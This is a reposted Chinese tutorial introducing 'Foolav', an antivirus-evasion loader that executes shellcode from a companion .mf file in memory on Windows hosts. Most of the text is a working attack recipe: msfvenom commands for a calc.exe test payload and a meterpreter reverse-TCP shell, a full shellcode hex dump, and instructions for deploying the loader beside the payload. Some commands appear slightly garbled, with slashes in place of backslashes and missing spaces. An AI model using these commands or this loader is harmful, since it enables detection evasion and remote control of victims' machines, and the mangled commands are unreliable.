转载

Foolav：免杀小工具+win主机运行任意payload

在渗透测试中，当你需要执行如meterpreter等的payload，而又需要做免杀时，下面这段代码编译的exe也许会对你产生帮助。你需要做的就是上传这两个文件，同目录下的可执行exe文件和payload文件。

实验指南

1.准备好你的payload（32位系统）：

calc（计算器实验版本）：

msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -ex86/shikata_ga_nai -b "/x00/x0a/x0d/xff" -f c 2>/dev/null | egrep"^/"" | tr -d "/"/n;" >foolav.mf 注意：你在这里并不需要使用编码或者避免使用敏感字符，它肯定会起作用的。

meterpreter（实战反弹shell版本）：

msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -ax86 -f c 2>/dev/null | egrep "^/"" | tr -d"/"/n;" >foolav.mf

2.payload文件（与exe文件重名，但后缀为mf），拷贝到与exe文件同目录，然后可以通过下面的方式启动calc.exe。

mf文件内容如下：

/xbb/x28/x30/x85/x5b/xd9/xf7/xd9/x74/x24/xf4/x5a/x2b/xc9/xb1/x33/x83/xea/xfc/x31/x5a/x0e/x03/x72/x3e/x67/xae/x7e/xd6/xee/x51/x7e/x27/x91/xd8/x9b/x16/x83/xbf/xe8/x0b/x13/xcb/xbc/xa7/xd8/x99/x54/x33/xac/x35/x5b/xf4/x1b/x60/x52/x05/xaa/xac/x38/xc5/xac/x50/x42/x1a/x0f/x68/x8d/x6f/x4e/xad/xf3/x80/x02/x66/x78/x32/xb3/x03/x3c/x8f/xb2/xc3/x4b/xaf/xcc/x66/x8b/x44/x67/x68/xdb/xf5/xfc/x22/xc3/x7e/x5a/x93/xf2/x53/xb8/xef/xbd/xd8/x0b/x9b/x3c/x09/x42/x64/x0f/x75/x09/x5b/xa0/x78/x53/x9b/x06/x63/x26/xd7/x75/x1e/x31/x2c/x04/xc4/xb4/xb1/xae/x8f/x6f/x12/x4f/x43/xe9/xd1/x43/x28/x7d/xbd/x47/xaf/x52/xb5/x73/x24/x55/x1a/xf2/x7e/x72/xbe/x5f/x24/x1b/xe7/x05/x8b/x24/xf7/xe1/x74/x81/x73/x03/x60/xb3/xd9/x49/x77/x31/x64/x34/x77/x49/x67/x16/x10/x78/xec/xf9/x67/x85/x27/xbe/x88/x67/xe2/xca/x20/x3e/x67/x77/x2d/xc1/x5d/xbb/x48/x42/x54/x43/xaf/x5a/x1d/x46/xeb/xdc/xcd/x3a/x64/x89/xf1/xe9/x85/x98/x91/x6c/x16/x40/x78/x0b/x9e/xe3/x84

3.如下图，一旦运行了可执行exe文件（foolav.exe），这里附上 下载地址 。payload文件（foolav.mf）就会被解析，导入单独线程，在内存中执行相应的功能：

Foolav：免杀小工具+win主机运行任意payload